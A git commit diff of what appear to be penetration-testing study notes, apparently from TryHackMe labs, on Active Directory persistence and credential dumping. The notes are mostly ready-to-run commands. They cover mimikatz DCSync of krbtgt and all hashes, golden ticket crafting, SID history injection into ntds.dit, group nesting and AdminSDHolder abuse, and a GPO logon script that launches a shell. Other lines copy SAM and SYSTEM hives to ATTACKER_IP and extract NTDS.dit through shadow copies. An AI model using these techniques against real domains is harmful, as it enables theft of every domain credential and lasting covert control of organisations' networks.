even more info
This commit is contained in:
parent
c78967a9a9
commit
e8c3e42f94
|
|
@ -1,9 +1,8 @@
|
||||||
# Active Directory Persistance
|
# Active Directory Persistance
|
||||||
|
|
||||||
|
|
||||||
## Using Credentials
|
## Using Credentials
|
||||||
|
|
||||||
* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest
|
* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest
|
||||||
* __DC Synchronisation__ is the process of syncing credentials between domain controllers, it can be used to gather credentials
|
* __DC Synchronisation__ is the process of syncing credentials between domain controllers, it can be used to gather credentials
|
||||||
* Credentials for multiple local administrators
|
* Credentials for multiple local administrators
|
||||||
* Service account with delegation permissions
|
* Service account with delegation permissions
|
||||||
|
|
@ -11,22 +10,27 @@
|
||||||
|
|
||||||
### Usage
|
### Usage
|
||||||
|
|
||||||
* Use mimikatz
|
Use mimikatz
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
lsadump::dcsync /domain:<domain> /user:<username>
|
lsadump::dcsync /domain:<domain> /user:<username>
|
||||||
```
|
```
|
||||||
* To query the krbtgt user
|
|
||||||
|
To query the krbtgt user
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
lsadump::dcsync /domain:<domain> /user:krbtgt.<domain>
|
lsadump::dcsync /domain:<domain> /user:krbtgt.<domain>
|
||||||
```
|
```
|
||||||
* Query everything
|
|
||||||
|
Query everything
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
lsadump::dcsync /domain:<domain> /all
|
lsadump::dcsync /domain:<domain> /all
|
||||||
```
|
```
|
||||||
|
|
||||||
## Using Tickets
|
## Using Tickets
|
||||||
|
|
||||||
* __Golden Ticket__ crafted TGT,
|
* __Golden Ticket__ crafted TGT,
|
||||||
* Needs domain name, domain SID and a user ID to impersonate
|
* Needs domain name, domain SID and a user ID to impersonate
|
||||||
* Needs krbtgt NTLM to sign the ticket
|
* Needs krbtgt NTLM to sign the ticket
|
||||||
* krbtgt hash never rotates automatically, only refreshed manually
|
* krbtgt hash never rotates automatically, only refreshed manually
|
||||||
|
|
@ -40,7 +44,7 @@ lsadump::dcsync /domain:<domain> /all
|
||||||
* DC is never contacted, no contact to any TGT or KDC
|
* DC is never contacted, no contact to any TGT or KDC
|
||||||
* Non existing user can be used with a local admin group's SID
|
* Non existing user can be used with a local admin group's SID
|
||||||
|
|
||||||
### Usage
|
### Usage
|
||||||
|
|
||||||
* Craft a golden ticket
|
* Craft a golden ticket
|
||||||
```sh
|
```sh
|
||||||
|
|
@ -95,22 +99,24 @@ Get-ADUser <your ad username> -properties sidhistory,memberof
|
||||||
```sh
|
```sh
|
||||||
Get-ADGroup "Domain Admins"
|
Get-ADGroup "Domain Admins"
|
||||||
```
|
```
|
||||||
* Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit`
|
|
||||||
|
Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit`
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
Stop-Service -Name ntds -force
|
Stop-Service -Name ntds -force
|
||||||
Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit
|
Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit
|
||||||
Start-Service -Name ntds
|
Start-Service -Name ntds
|
||||||
```
|
```
|
||||||
* Verify users SIDs
|
* Verify users SIDs
|
||||||
```sh
|
```sh
|
||||||
Get-ADUser <username> -Properties sidhistory
|
Get-ADUser <username> -Properties sidhistory
|
||||||
dir \\<dc.example.com>\C$\
|
dir \\<dc.example.com>\C$\
|
||||||
```
|
```
|
||||||
|
|
||||||
## Using Group Memberships
|
## Using Group Memberships
|
||||||
|
|
||||||
* Most are monitored security wise
|
* Most are monitored security wise
|
||||||
* Interesting group for persistence are
|
* Interesting group for persistence are
|
||||||
* `IT Support`
|
* `IT Support`
|
||||||
* Local administrational accounts
|
* Local administrational accounts
|
||||||
* Groups with ownership over GPO
|
* Groups with ownership over GPO
|
||||||
|
|
@ -126,7 +132,7 @@ New-ADGroup -Path "OU=IT,OU=People,DC=<SUBDC>,DC=<DOMAIN>,DC=COM" -Name "<userna
|
||||||
```
|
```
|
||||||
* And nesting another one
|
* And nesting another one
|
||||||
```sh
|
```sh
|
||||||
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Steam Network 2" -SamAccountName "<username>_steam_network2" -DisplayName "<username> Steam Network 2" -GroupScope Global -GroupCategory Security
|
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Steam Network 2" -SamAccountName "<username>_steam_network2" -DisplayName "<username> Steam Network 2" -GroupScope Global -GroupCategory Security
|
||||||
|
|
||||||
Add-ADGroupMember -Identity "<username>_steam_network2" -Members "<username>_steam_network1"
|
Add-ADGroupMember -Identity "<username>_steam_network2" -Members "<username>_steam_network1"
|
||||||
```
|
```
|
||||||
|
|
@ -154,7 +160,7 @@ Get-ADGroupMember -Identity "Domain Admins"
|
||||||
|
|
||||||
* AD group templates like `AdminSDHolder` can be used to copy its ACL through the AD's protected groups
|
* AD group templates like `AdminSDHolder` can be used to copy its ACL through the AD's protected groups
|
||||||
* Domain Admins
|
* Domain Admins
|
||||||
* Administrators
|
* Administrators
|
||||||
* Enterprise/Schema Administrator
|
* Enterprise/Schema Administrator
|
||||||
* SDProp as a process maps the ACLs to protected groups every hour
|
* SDProp as a process maps the ACLs to protected groups every hour
|
||||||
|
|
||||||
|
|
@ -190,7 +196,7 @@ copy \\<domain>\sysvol\<subdomain>\scripts\shell.exe C:\windows\tmp\_shell.exe &
|
||||||
* Select the previously created batch script and PE
|
* Select the previously created batch script and PE
|
||||||
* Catch the shell when an admin logs on
|
* Catch the shell when an admin logs on
|
||||||
|
|
||||||
* Once again open mmc
|
* Once again open mmc
|
||||||
* Right click Enterprise Domain Controllers -> Edit settings, delete, modify security
|
* Right click Enterprise Domain Controllers -> Edit settings, delete, modify security
|
||||||
* Click on every other group except Authenticated Users and remove them
|
* Click on every other group except Authenticated Users and remove them
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -337,6 +337,17 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam
|
||||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#### In case you are on a DC
|
||||||
|
|
||||||
|
You can extract the AD database which stores every domain account and its password hash via Volume Shadow Copy Service. `NTDS.dit` is stored at `C:\Windows\NTDS\ntdis.dit`.
|
||||||
|
|
||||||
|
```sh
|
||||||
|
vssadmin create shadow /for=C:
|
||||||
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\TEMP\ntds.dit
|
||||||
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\TEMP\system
|
||||||
|
vssadmin delete shadows /shadow={$SHADOW_ID} /quiet
|
||||||
|
```
|
||||||
|
|
||||||
### Dump LSASS
|
### Dump LSASS
|
||||||
|
|
||||||
LSASS contains multiple different credential types like NTLM password hashes,
|
LSASS contains multiple different credential types like NTLM password hashes,
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue